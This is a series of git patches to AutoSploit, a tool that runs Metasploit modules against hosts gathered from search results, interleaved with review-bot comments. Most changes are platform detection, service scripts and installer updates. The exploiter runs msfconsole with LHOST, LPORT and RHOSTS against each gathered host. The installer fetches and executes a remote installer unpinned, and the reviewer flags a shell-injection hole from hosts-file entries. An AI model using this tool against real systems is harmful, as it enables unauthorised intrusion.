+echo "| o || | || || ( \_ | o ) | | || | | |";
+echo "| || | ||_| |_|| O |\__ || _/| |___ | O || | |_| |_|";
+echo "| _ || : | | | | |/ \ || | | || || | | | ";
+echo "| | || | | | | |\ || | | || || | | | ";
+echo "|__|__| \__,_| |__| \___/ \___||__| |_____| \___/|____| |__| ";
+echo " ";
+
+function installDebian() {
+ sudo apt-get update;
+ sudo apt-get -y install git python2.7 python-pip postgresql apache2;
+ pip2 install requests psutil;
+ installMSF;
+}
+
+function installFedora() {
+ sudo yum -y install git python-pip;
+ pip2 install requests psutil;
+ installMSF;
+}
+
+function installMSF() {
+ if [[ ! "$(which msfconsole)" = */* ]]; then
+ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
+ chmod 755 msfinstall && \
+ ./msfinstall;
+ rm msfinstall;
+ fi
+}
+
+function install() {
+ case "$(uname -a)" in
+ *Debian*|*Ubuntu*)
+ installDebian;
+ ;;
+ *Fedora*)
+ installFedora;
+ ;;
+ *)
+ echo "Unable to detect Linux flavor...";
+ ;;
+ esac
+ echo "";
+ echo "Installation Complete";
+}
+
+install;
From ce02fb7028b7989abe471446246b5b28c83743b3 Mon Sep 17 00:00:00 2001 From: Evan Lewis Date: Fri, 23 Mar 2018 09:20:28 -0400 Subject: [PATCH 10/31] Added platform detection and support for OSX in service check and start (#101) * Added platform detection and support for OSX in service check and start * Moved brew start command into bash file * Moved apache start to bash file and removed a sudo --- autosploit/main.py | 30 +++++++++++++++++++++++++----- etc/scripts/start_apache_osx.sh | 3 +++ etc/scripts/start_postgre_osx.sh | 3 +++ lib/settings.py | 6 ++++++ 4 files changed, 37 insertions(+), 5 deletions(-) create mode 100644 etc/scripts/start_apache_osx.sh create mode 100644 etc/scripts/start_postgre_osx.sh
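Review bot: In `installMSF`, `curl https://raw.githubusercontent.com/.../msfupdate.erb > msfinstall` runs without `-f`, so an HTTP error body or a truncated transfer is written to `msfinstall` and then executed by `./msfinstall` two lines later; the `&&` chain only guards curl's own exit status, which is 0 on a 404 unless `-f` is given. At minimum use `curl -fsSL ... -o msfinstall || return 1` so a failed download aborts rather than executing whatever came back. The installer is fetched from the `master` branch with no pinned revision or checksum, so every install trusts the current contents of that path; pinning to a commit hash and checking a known sha256 before `chmod 755 msfinstall` would make the install reproducible and tamper-evident. `pip2 install requests psutil` is likewise unpinned, a smaller instance of the same supply-chain concern.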
diff --git a/autosploit/main.py b/autosploit/main.py index 58e7694..83b4ae9 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -1,6 +1,6 @@ import sys - import psutil +import platform from lib.cmdline.cmd import AutoSploitParser from lib.term.terminal import AutoSploitTerminal @@ -18,7 +18,9 @@ cmdline, EXPLOIT_FILES_PATH, START_APACHE_PATH, - START_POSTGRESQL_PATH + START_APACHE_OSX_PATH, + START_POSTGRESQL_PATH, + START_POSTGRESQL_OSX_PATH ) from lib.jsonize import load_exploits @@ -31,7 +33,12 @@ def main(): info("welcome to autosploit, give us a little bit while we configure") misc_info("checking for disabled services") # according to ps aux, postgre and apache2 are the names of the services - service_names = ("postgres", "apache2") + + if platform.system() == "Darwin": + service_names = ("postgres","httpd") + elif platform.system() == "Linux": + service_names = ("postgres", "apache2") + for service in list(service_names): while not check_services(service): choice = prompt( @@ -42,9 +49,22 @@ def main(): if choice.lower().startswith("y"): try: if "postgre" in service: - cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) + if platform.system() == "Linux": + cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) + elif platform.system() == "Darwin": + cmdline("sudo bash {}".format(START_POSTGRESQL_OSX_PATH)) + else: + error("Currently not supporting windows") + sys.exit(1) else: - cmdline("sudo bash {}".format(START_APACHE_PATH)) + if platform.system() == "Linux": + cmdline("sudo bash {}".format(START_APACHE_PATH)) + elif platform.system() == "Darwin": + cmdline("sudo bash {}".format(START_APACHE_OSX_PATH)) + else: + error("Currently not supporting windows") + sys.exit(1) + # moving this back because it was funky to see it each run info("services started successfully") # this tends to show up when trying to start the services diff --git a/etc/scripts/start_apache_osx.sh b/etc/scripts/start_apache_osx.sh new file mode 100644 index 0000000..1e74ae7 
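Review bot: `service_names` is only assigned when `platform.system()` is `"Darwin"` or `"Linux"`, so on any other platform the following `for service in list(service_names):` raises `UnboundLocalError` before the `error("Currently not supporting windows")` branches further down can ever run. Keep a default ahead of the branches, e.g. `service_names = ("postgres", "apache2")`, or add `else: error("Currently not supporting windows"); sys.exit(1)` directly after the `elif`, so the unsupported-platform message stays reachable. `platform.system()` is also re-evaluated on every iteration and in each nested branch; reading it once into a local before the loop would remove the repetition. `main()` continues beyond this hunk.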
--- /dev/null +++ b/etc/scripts/start_apache_osx.sh @@ -0,0 +1,3 @@ +#!/bin/bash + +sudo apachectl start diff --git a/etc/scripts/start_postgre_osx.sh b/etc/scripts/start_postgre_osx.sh new file mode 100644 index 0000000..8812af6 --- /dev/null +++ b/etc/scripts/start_postgre_osx.sh @@ -0,0 +1,3 @@ +#!/bin/bash + +brew services restart postgresql diff --git a/lib/settings.py b/lib/settings.py index ba136c6..7e28523 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -27,9 +27,15 @@ # path to the bash script to stack the PostgreSQL service START_POSTGRESQL_PATH = "{}/etc/scripts/start_postgre.sh".format(CUR_DIR) +# path to the bash script to stack the PostgreSQL service on OSX +START_POSTGRESQL_OSX_PATH = "{}/etc/scripts/start_postgre_osx.sh".format(CUR_DIR) + # path to the bash script to start the Apache service START_APACHE_PATH = "{}/etc/scripts/start_apache.sh".format(CUR_DIR) +# path to the bash script to start the Apache service on OSX +START_APACHE_PATH = "{}/etc/scripts/start_apache_osx.sh".format(CUR_DIR) + # path to the file that will contain our query QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name From fd112f2b8dd3db7f9e93ea3e5001bc6694ef3531 Mon Sep 17 00:00:00 2001 
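Review bot: `brew services restart postgresql` is reached via `cmdline("sudo bash {}".format(START_POSTGRESQL_OSX_PATH))` in this commit's `autosploit/main.py` hunk, so on macOS Homebrew is invoked as root; current Homebrew versions refuse to run under sudo, so PostgreSQL is unlikely to start through this path. Either call this script without `sudo` from `main.py`, or drop privileges inside it, e.g. `sudo -u "$SUDO_USER" brew services restart postgresql`, so brew runs as the invoking user. The sibling `start_apache_osx.sh` is a different case, since `apachectl start` typically does need root to bind port 80.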
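Review bot: The new OSX Apache constant is assigned to `START_APACHE_PATH` rather than `START_APACHE_OSX_PATH`, so `from lib.settings import START_APACHE_OSX_PATH` in this commit's `autosploit/main.py` hunk raises `ImportError`, and the Linux constant defined a few lines above is silently overwritten with the OSX script path. The line should read `START_APACHE_OSX_PATH = "{}/etc/scripts/start_apache_osx.sh".format(CUR_DIR)`. Both PostgreSQL comments say "stack the PostgreSQL service"; "start" is presumably intended.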
From: ekultek Date: Fri, 23 Mar 2018 08:48:40 -0500 Subject: [PATCH 11/31] moving the translations into their own directory and will have a link to them in the near future --- README-fr.md => .github/.transaltions/README-fr.md | 0 README-zh.md => .github/.transaltions/README-zh.md | 0 etc/scripts/start_apache.sh | 3 --- etc/scripts/start_apache_osx.sh | 3 --- etc/scripts/start_postgre.sh | 3 --- etc/scripts/start_postgre_osx.sh | 3 --- etc/scripts/start_services.sh | 1 + 7 files changed, 1 insertion(+), 12 deletions(-) rename README-fr.md => .github/.transaltions/README-fr.md (100%) rename README-zh.md => .github/.transaltions/README-zh.md (100%) delete mode 100644 etc/scripts/start_apache.sh delete mode 100644 etc/scripts/start_apache_osx.sh delete mode 100644 etc/scripts/start_postgre.sh delete mode 100644 etc/scripts/start_postgre_osx.sh create mode 100644 etc/scripts/start_services.sh diff --git a/README-fr.md b/.github/.transaltions/README-fr.md similarity index 100% rename from README-fr.md rename to .github/.transaltions/README-fr.md diff --git a/README-zh.md b/.github/.transaltions/README-zh.md similarity index 100% rename from README-zh.md rename to .github/.transaltions/README-zh.md diff --git a/etc/scripts/start_apache.sh b/etc/scripts/start_apache.sh deleted file mode 100644 index 6d18460..0000000 --- a/etc/scripts/start_apache.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -sudo service apache2 start > /dev/null 2>&1 diff --git a/etc/scripts/start_apache_osx.sh b/etc/scripts/start_apache_osx.sh deleted file mode 100644 index 1e74ae7..0000000 --- a/etc/scripts/start_apache_osx.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -sudo apachectl start diff --git a/etc/scripts/start_postgre.sh b/etc/scripts/start_postgre.sh deleted file mode 100644 index d5d279a..0000000 --- a/etc/scripts/start_postgre.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -sudo service postgresql start > /dev/null 2>&1 
diff --git a/etc/scripts/start_postgre_osx.sh b/etc/scripts/start_postgre_osx.sh deleted file mode 100644 index 8812af6..0000000 --- a/etc/scripts/start_postgre_osx.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -brew services restart postgresql diff --git a/etc/scripts/start_services.sh b/etc/scripts/start_services.sh new file mode 100644 index 0000000..212c4ba --- /dev/null +++ b/etc/scripts/start_services.sh @@ -0,0 +1 @@ +#!/usr/bin/env bash \ No newline at end of file From c2d808d3f2b598a7780c3733d9446c50db1cb25f Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:48:58 -0500 Subject: [PATCH 12/31] working on the translations links --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 19f4455..71b5d4a 100644 --- a/README.md +++ b/README.md @@ -21,6 +21,7 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) + - [README translations]() # Installation @@ -177,3 +178,8 @@ If you need some help understanding the code, or want to chat with some other Au If you happen to encounter a bug please feel free to [Open a Ticket](https://github.com/NullArray/AutoSploit/issues). Thanks in advance. + +## Translations + + - [FR]() + - [ZH]() From e2b26d4107c173785746d7e1a34aacc673ef7ca8 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:49:40 -0500 Subject: [PATCH 13/31] starting compatibility with macos --- autosploit/main.py | 40 ++++++++++++----------------------- etc/scripts/start_services.sh | 32 +++++++++++++++++++++++++++- 2 files changed, 44 insertions(+), 28 deletions(-) diff --git a/autosploit/main.py b/autosploit/main.py index 83b4ae9..ff1ac81 100644 --- a/autosploit/main.py +++ b/autosploit/main.py 
@@ -7,7 +7,6 @@ from lib.output import ( info, warning, - error, prompt, misc_info ) @@ -16,11 +15,9 @@ load_api_keys, check_services, cmdline, + close, EXPLOIT_FILES_PATH, - START_APACHE_PATH, - START_APACHE_OSX_PATH, - START_POSTGRESQL_PATH, - START_POSTGRESQL_OSX_PATH + START_SERVICES_PATH ) from lib.jsonize import load_exploits @@ -31,12 +28,12 @@ def main(): logo() info("welcome to autosploit, give us a little bit while we configure") + misc_info("checking your running platform") + platform_running = platform.system() misc_info("checking for disabled services") - # according to ps aux, postgre and apache2 are the names of the services - - if platform.system() == "Darwin": - service_names = ("postgres","httpd") - elif platform.system() == "Linux": + # according to ps aux, postgre and apache2 are the names of the services on Linux systems + service_names = ("postgres", "apache2") + if "darwin" in platform_running.lower(): service_names = ("postgres", "apache2") for service in list(service_names): @@ -48,22 +45,12 @@ def main(): ) if choice.lower().startswith("y"): try: - if "postgre" in service: - if platform.system() == "Linux": - cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) - elif platform.system() == "Darwin": - cmdline("sudo bash {}".format(START_POSTGRESQL_OSX_PATH)) - else: - error("Currently not supporting windows") - sys.exit(1) + if "darwin" in platform_running.lower(): + cmdline("{} darwin".format(START_SERVICES_PATH)) + elif "linux" in platform_running.lower(): + cmdline("{} linux".format(START_SERVICES_PATH)) else: - if platform.system() == "Linux": - cmdline("sudo bash {}".format(START_APACHE_PATH)) - elif platform.system() == "Darwin": - cmdline("sudo bash {}".format(START_APACHE_OSX_PATH)) - else: - error("Currently not supporting windows") - sys.exit(1) + close("your platform is not supported by AutoSploit at this time", status=2) # moving this back because it was funky to see it each run info("services started successfully") 
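Review bot: `cmdline("{} darwin".format(START_SERVICES_PATH))` executes `etc/scripts/start_services.sh` directly, but that file was added with `create mode 100644` in the preceding commit, so the call fails with a permission error on any checkout that does not `chmod +x` it; the code it replaces ran the scripts through `sudo bash {}`, which did not depend on the mode bit. Use `cmdline("bash {} darwin".format(START_SERVICES_PATH))` (and the same for linux), or commit the script as 100755. Because `cmdline`'s result is not checked, the `info("services started successfully")` that follows prints whether or not the script ran; only the enclosing `while not check_services(service)` loop notices, by prompting again. The `if "darwin" in platform_running.lower():` branch assigns the same tuple as the default line above it, so it currently has no effect. `main()` starts and ends outside this hunk.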
@@ -72,13 +59,12 @@ def main(): except psutil.NoSuchProcess: pass else: - error( + close( "service {} is required to be started for autosploit to run successfully (you can do it manually " "by using the command `sudo service {} start`), exiting".format( service.title(), service ) ) - sys.exit(1) if len(sys.argv) > 1: info("attempting to load API keys") diff --git a/etc/scripts/start_services.sh b/etc/scripts/start_services.sh index 212c4ba..2a4ca0f 100644 --- a/etc/scripts/start_services.sh +++ b/etc/scripts/start_services.sh @@ -1 +1,31 @@ -#!/usr/bin/env bash \ No newline at end of file +#!/bin/bash + +function startApacheLinux () { + sudo service apache2 start > /dev/null 2>&1 +} + +function startPostgreSQLLinux () { + sudo service postgresql start > /dev/null 2>&1 +} + +function startApacheOSX () { + sudo apachectl start > /dev/null 2>&1 +} + +function startPostgreSQLOSX () { + brew services restart postgresql > /dev/null 2>&1 +} + +function main () { + if [ $1 == "linux" ]; then + startApacheLinux; + startPostgreSQLLinux; + elif [ $1 == "darwin" ]; then + startApacheOSX; + startPostgreSQLOSX; + else + echo "[*} invalid operating system"; + fi +} + +main $@; \ No newline at end of file From bf6c2308d48ba1965d0d5667957d4cb1e855030a Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:49:53 -0500 Subject: [PATCH 14/31] starting compatibility with macos --- install.sh | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/install.sh b/install.sh index b00b4a5..2d4b49c 100755 --- a/install.sh +++ b/install.sh 
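Review bot: In `main ()`, `$1` is unquoted in `[ $1 == "linux" ]` and `[ $1 == "darwin" ]`, so running the script with no argument produces a `unary operator expected` error instead of reaching the `else` branch; quote it (`[ "$1" = "linux" ]`) and change `main $@;` to `main "$@";`. The invalid-OS branch prints `"[*} invalid operating system"` (mismatched bracket) to stdout and the script still exits 0, so the Python caller cannot tell it from success; make it `echo "[*] invalid operating system" >&2; exit 1;`. Each start function also redirects both streams to `/dev/null`, so a failing `service`, `apachectl` or `brew` call is invisible to the caller as well; consider keeping stderr or returning the last command's status.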
@@ -9,20 +9,29 @@ echo "| | || | | | | |\ || | | || || | | | "; echo "|__|__| \__,_| |__| \___/ \___||__| |_____| \___/|____| |__| "; echo " "; -function installDebian() { +function installDebian () { sudo apt-get update; sudo apt-get -y install git python2.7 python-pip postgresql apache2; pip2 install requests psutil; installMSF; } -function installFedora() { +function installFedora () { sudo yum -y install git python-pip; pip2 install requests psutil; installMSF; } -function installMSF() { +function installOSX () { + sudo /usr/sbin/apachectl start; + brew doctor; + brew update; + brew install postgresql; + brew services start postgresql; + installMSF; +} + +function installMSF () { if [[ ! "$(which msfconsole)" = */* ]]; then curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ @@ -31,7 +40,7 @@ function installMSF() { fi } -function install() { +function install () { case "$(uname -a)" in *Debian*|*Ubuntu*) installDebian; @@ -39,8 +48,11 @@ function install() { *Fedora*) installFedora; ;; + *Darwin*) + installOSX; + ;; *) - echo "Unable to detect Linux flavor..."; + echo "Unable to detect operating system that is compatible with AutoSploit..."; ;; esac echo ""; From e2e72d54b1e7912795d7140981245550a8c5d283 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:50:01 -0500 Subject: [PATCH 15/31] starting compatibility with macos --- lib/settings.py | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/lib/settings.py b/lib/settings.py index 7e28523..b90900d 100644 --- a/lib/settings.py +++ b/lib/settings.py 
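Review bot: `installOSX` never installs the Python dependencies: the Debian and Fedora branches both run `pip2 install requests psutil;`, but the new function only sets up Apache, Homebrew PostgreSQL and MSF, so `import psutil` in `autosploit/main.py` fails on a fresh macOS install. Add `pip2 install requests psutil;` before `installMSF;`. The `case "$(uname -a)"` dispatch also matches against the full uname string, which includes the hostname, so a machine named e.g. `fedora-lab` is classified by its name rather than its distribution, and it is not obvious that Fedora's kernel string always contains the word `Fedora`; `"$(uname -s)"` for Darwin plus `/etc/os-release` for the Linux flavours would be more reliable.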
@@ -24,17 +24,8 @@ # path to the usage and legal file USAGE_AND_LEGAL_PATH = "{}/etc/text_files/general".format(CUR_DIR) -# path to the bash script to stack the PostgreSQL service -START_POSTGRESQL_PATH = "{}/etc/scripts/start_postgre.sh".format(CUR_DIR) - -# path to the bash script to stack the PostgreSQL service on OSX -START_POSTGRESQL_OSX_PATH = "{}/etc/scripts/start_postgre_osx.sh".format(CUR_DIR) - -# path to the bash script to start the Apache service -START_APACHE_PATH = "{}/etc/scripts/start_apache.sh".format(CUR_DIR) - -# path to the bash script to start the Apache service on OSX -START_APACHE_PATH = "{}/etc/scripts/start_apache_osx.sh".format(CUR_DIR) +# one bash script to rule them all takes an argument via the operating system +START_SERVICES_PATH = "{}/etc/scripts/start_services.sh".format(CUR_DIR) # path to the file that will contain our query QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name From 9ca2fd0590e7c73bf5aaa1fee733128301b1f926 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:54:04 -0500 Subject: [PATCH 16/31] fixed a typo and created translation links (will not work until pushed to master) --- .github/{.transaltions => .translations}/README-fr.md | 0 .github/{.transaltions => .translations}/README-zh.md | 0 README.md | 6 +++--- 3 files changed, 3 insertions(+), 3 deletions(-) rename .github/{.transaltions => .translations}/README-fr.md (100%) rename .github/{.transaltions => .translations}/README-zh.md (100%) diff --git a/.github/.transaltions/README-fr.md b/.github/.translations/README-fr.md similarity index 100% rename from .github/.transaltions/README-fr.md rename to .github/.translations/README-fr.md diff --git a/.github/.transaltions/README-zh.md b/.github/.translations/README-zh.md similarity index 100% rename from .github/.transaltions/README-zh.md rename to .github/.translations/README-zh.md diff --git a/README.md b/README.md index 71b5d4a..22b5349 100644 --- a/README.md +++ b/README.md 
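Review bot: The comment above `START_SERVICES_PATH`, "one bash script to rule them all takes an argument via the operating system", does not say what the argument is; since `autosploit/main.py` invokes the script as `start_services.sh linux` or `start_services.sh darwin`, something like `# path to the single service-start script; takes the platform name ("linux" or "darwin") as its only argument` documents the contract the caller relies on. It is also worth noting there that the script is executed directly rather than via `bash`, so it must stay executable in the repository.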
@@ -21,7 +21,7 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) - - [README translations]() + - [README translations](https://github.com/NullArray/AutoSploit#translations) # Installation @@ -181,5 +181,5 @@ Thanks in advance. ## Translations - - [FR]() - - [ZH]() + - [FR](https://github.com/NullArray/AutoSploit/blob/master/.github/.translations/README-fr.md) + - [ZH](https://github.com/NullArray/AutoSploit/blob/master/.github/.translations/README-zh.md) From fc5f6aee1af78203a2a8ded5e9720ada5a3ed96d Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 08:56:35 -0500 Subject: [PATCH 17/31] implement issue #99 --- lib/exploitation/exploiter.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index 445672a..f8cdc16 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -42,7 +42,7 @@ def start_exploit(self): template = ( "sudo {} {} -x 'workspace -a {}; " "setg LHOST {}; setg LPORT {}; setg VERBOSE " - "true; setg THREADS 100; set RHOSTS {}; use {} -j;'" + "true; setg THREADS 100; set RHOST {}; set RHOSTS {}; use {} -j;'" ) for host in self.hosts: for mod in self.mods: @@ -55,6 +55,6 @@ def start_exploit(self): "ruby" if self.ruby_exec else "", self.msf_path if self.msf_path is not None else "msfconsole", self.configuration[0], self.configuration[1], self.configuration[2], - host.strip(), mod.strip() + host.strip(), host.strip(), mod.strip() ) lib.settings.cmdline(template) From df45d4d1362c7c68059dd046ac84c14a522d8f05 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 16:30:27 -0500 Subject: [PATCH 18/31] minor update to one of the banners --- lib/banner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
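Review bot: `host.strip()` is now interpolated twice into the single-quoted `-x '...'` argument of a command string that `lib.settings.cmdline` runs via `sudo`, so a hosts-file line containing a `'` followed by shell text breaks out of the quotes and executes as root; the hosts file is built from gathered search results or a user-supplied path, so it should not be assumed shell-safe. Validate each entry before formatting, e.g. `ipaddress.ip_address(host.strip())` if hosts are expected to be bare IP addresses (the `ipaddress` backport or `socket.inet_aton` on Python 2.7), or at least pass the whole `-x` script through `shlex.quote`, and apply the same check to `mod.strip()` which comes from the modules JSON. Since the template is formatted per host and per module, a single bad entry would otherwise abort the whole loop; catching the validation error per host and skipping with a warning keeps the run going. `start_exploit` begins before this hunk.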
diff --git a/lib/banner.py b/lib/banner.py index 323fe52..6f14683 100644 --- a/lib/banner.py +++ b/lib/banner.py @@ -67,7 +67,7 @@ def banner_4(): {red} .__. , __. . , {end} {red} [__]. .-+- _ (__ ._ | _ *-+- {end} {red} | |(_| | (_).__)[_)|(_)| | {end} -{red} | {end} +{red} | {end} {red} _ ._ _ , _ ._ {end} {red} (_ ' ( ` )_ .__) {end} {red} ( ( ( ) `) ) _) {end} From b5b2b2acec62e4ffa5e53f724929c205c10db460 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 16:30:47 -0500 Subject: [PATCH 19/31] edited some minor details depnding on your OS --- autosploit/main.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/autosploit/main.py b/autosploit/main.py index ff1ac81..e3838ce 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -34,7 +34,7 @@ def main(): # according to ps aux, postgre and apache2 are the names of the services on Linux systems service_names = ("postgres", "apache2") if "darwin" in platform_running.lower(): - service_names = ("postgres", "apache2") + service_names = ("postgres", "apachectl") for service in list(service_names): while not check_services(service): @@ -59,10 +59,13 @@ def main(): except psutil.NoSuchProcess: pass else: + process_start_command = "`sudo service {} start`" + if "darwin" in platform_running.lower(): + process_start_command = "`brew services start {}`" close( "service {} is required to be started for autosploit to run successfully (you can do it manually " - "by using the command `sudo service {} start`), exiting".format( - service.title(), service + "by using the command {}), exiting".format( + service.title(), process_start_command.format(service) ) ) From 87c0cb0c66f5fa9356bdc474eae839e908d3109e Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 23 Mar 2018 16:31:09 -0500 Subject: [PATCH 20/31] caught an exception that happens from psutils --- lib/settings.py | 24 ++++++++++++++++-------- 1 file changed, 16 insertions(+), 8 deletions(-) 
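Review bot: `service_names = ("postgres", "apachectl")` makes `check_services` look for a running process whose command line contains `apachectl`, but `apachectl` is the control utility used to launch Apache (`sudo apachectl start` in `start_services.sh`) and presumably does not stay resident after starting the daemon, so the check is likely to keep reporting Apache as stopped on macOS even after a successful start; the earlier Darwin tuple used `"httpd"`, the daemon's process name, which looks like the right value. The manual-start hint is inconsistent for Apache as well: `"`brew services start {}`"` is formatted with `apachectl`, while the tool's own `start_services.sh` starts Apache with `sudo apachectl start`, so the message should special-case Apache rather than assume every service is Homebrew-managed. `main()` starts and ends outside this hunk.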
diff --git a/lib/settings.py b/lib/settings.py index b90900d..4727260 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -85,14 +85,22 @@ def check_services(service_name): """ check to see if certain services ar started """ - all_processes = set() - for pid in psutil.pids(): - running_proc = psutil.Process(pid) - all_processes.add(" ".join(running_proc.cmdline()).strip()) - for proc in list(all_processes): - if service_name in proc: - return True - return False + try: + all_processes = set() + for pid in psutil.pids(): + running_proc = psutil.Process(pid) + all_processes.add(" ".join(running_proc.cmdline()).strip()) + for proc in list(all_processes): + if service_name in proc: + return True + return False + except psutil.ZombieProcess as e: + # zombie processes appear to happen on macOS for some reason + # so we'll just kill them off + pid = str(e).split("=")[-1].split(")")[0] + os.kill(int(pid), 0) + return True + def write_to_file(data_to_write, filename, mode="a+"): From 9a8a67228dd47f32de0f0b1ee8ad1fc6c14badb9 Mon Sep 17 00:00:00 2001 From: atucom Date: Mon, 26 Mar 2018 10:52:51 -0500 Subject: [PATCH 21/31] Changed the host_path check to not override itself (#105) The try except block was overriding the path var with the contents of the folder causing errors further down. Changed to just check for proper opening of the file. --- lib/term/terminal.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/term/terminal.py b/lib/term/terminal.py index 5287e5d..b3c5e40 100644 --- a/lib/term/terminal.py +++ b/lib/term/terminal.py @@ -19,8 +19,9 @@ def __init__(self, tokens): self.tokens = tokens self.usage_path = lib.settings.USAGE_AND_LEGAL_PATH self.sep = "-" * 30 + self.host_path = lib.settings.HOST_FILE try: - self.host_path = open(lib.settings.HOST_FILE).readlines() + open(lib.settings.HOST_FILE).readlines() except IOError: lib.output.warning("no hosts file present, you need to gather some hosts") self.host_path = lib.settings.HOST_FILE 
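Review bot: The new `except psutil.ZombieProcess` handler makes `check_services` return `True` for whatever `service_name` was asked about as soon as any zombie is encountered, so a single defunct process anywhere on the system makes both `postgres` and `apache2` appear to be running. The comment says the zombie is killed off, but `os.kill(int(pid), 0)` sends signal 0, which only tests that the pid exists, and parsing the pid out of `str(e)` depends on psutil's message format; the handler also leaves `psutil.NoSuchProcess` (pid exited between `pids()` and `Process()`) and `psutil.AccessDenied` (another user's process) uncaught. Catch these per pid inside the loop and skip that process instead of aborting the scan, as below.
```python
def check_services(service_name):
    # … unchanged: docstring …
    for pid in psutil.pids():
        try:
            running_cmdline = " ".join(psutil.Process(pid).cmdline()).strip()
        except (psutil.NoSuchProcess, psutil.ZombieProcess, psutil.AccessDenied):
            # vanished, defunct or foreign processes cannot be the service we are
            # looking for; skip them rather than aborting the whole scan
            continue
        if service_name in running_cmdline:
            return True
    return False
```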
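Review bot: The existence probe `open(lib.settings.HOST_FILE).readlines()` reads the whole hosts file into memory only to discard it, and the file object is never closed; the `self.host_path = lib.settings.HOST_FILE` in the `except IOError:` branch also just repeats the assignment made above the `try`. A cheaper probe that closes its handle is `with open(lib.settings.HOST_FILE): pass`, keeping the `except IOError:` warning and dropping the redundant reassignment. `__init__` is cut at the top of this hunk.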
From 02aac59b7f88944c61a66b066be6873f55f70a3e Mon Sep 17 00:00:00 2001 From: atucom <466817+atucom@users.noreply.github.com> Date: Tue, 27 Mar 2018 11:48:32 -0500 Subject: [PATCH 22/31] Fixed exploit_gathered_hosts() to read the hosts (#107) --- lib/term/terminal.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/term/terminal.py b/lib/term/terminal.py index b3c5e40..f8766bc 100644 --- a/lib/term/terminal.py +++ b/lib/term/terminal.py @@ -170,7 +170,7 @@ def exploit_gathered_hosts(self, loaded_mods, hosts=None): ruby_exec = False msf_path = None if hosts is None: - host_file = self.host_path + host_file = open(self.host_path).readlines() else: host_file = open(hosts).readlines() if not lib.settings.check_for_msf(): From 6dcbb75fd1419eacd14a4aa913c97fbaea7cd962 Mon Sep 17 00:00:00 2001 From: atucom <466817+atucom@users.noreply.github.com> Date: Tue, 27 Mar 2018 16:49:53 -0500 Subject: [PATCH 23/31] fixed check_for_msf() to check in $PATH (#108) * fixed check_for_msf() to check in $PATH * check_msf_path() now checks both os.environ and PATH --- lib/settings.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/settings.py b/lib/settings.py index 4727260..a6a91fd 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -6,6 +6,7 @@ import platform import getpass import tempfile +import distutils.spawn # import subprocess import psutil @@ -179,7 +180,7 @@ def check_for_msf(): """ check the ENV PATH for msfconsole """ - return os.getenv("msfconsole", False) + return os.getenv("msfconsole", False) or distutils.spawn.find_executable("msfconsole") def logo(): """ From 629332f4a04b0831a4023d518d906a1276ec4df5 Mon Sep 17 00:00:00 2001 
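Review bot: `host_file = open(self.host_path).readlines()` now re-reads the hosts file on every exploit run, but the constructor only warns when that file is missing (the `except IOError:` in `__init__`), so choosing the exploit option before any hosts are gathered surfaces here as an unhandled `IOError` traceback rather than the friendly warning; the `open(hosts).readlines()` branch below has the same gap and neither handle is closed. Wrap the read in `with open(self.host_path) as f: host_file = f.readlines()` inside a `try`, and on `IOError` emit `lib.output.warning(...)` and return early. `exploit_gathered_hosts` begins before this hunk.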
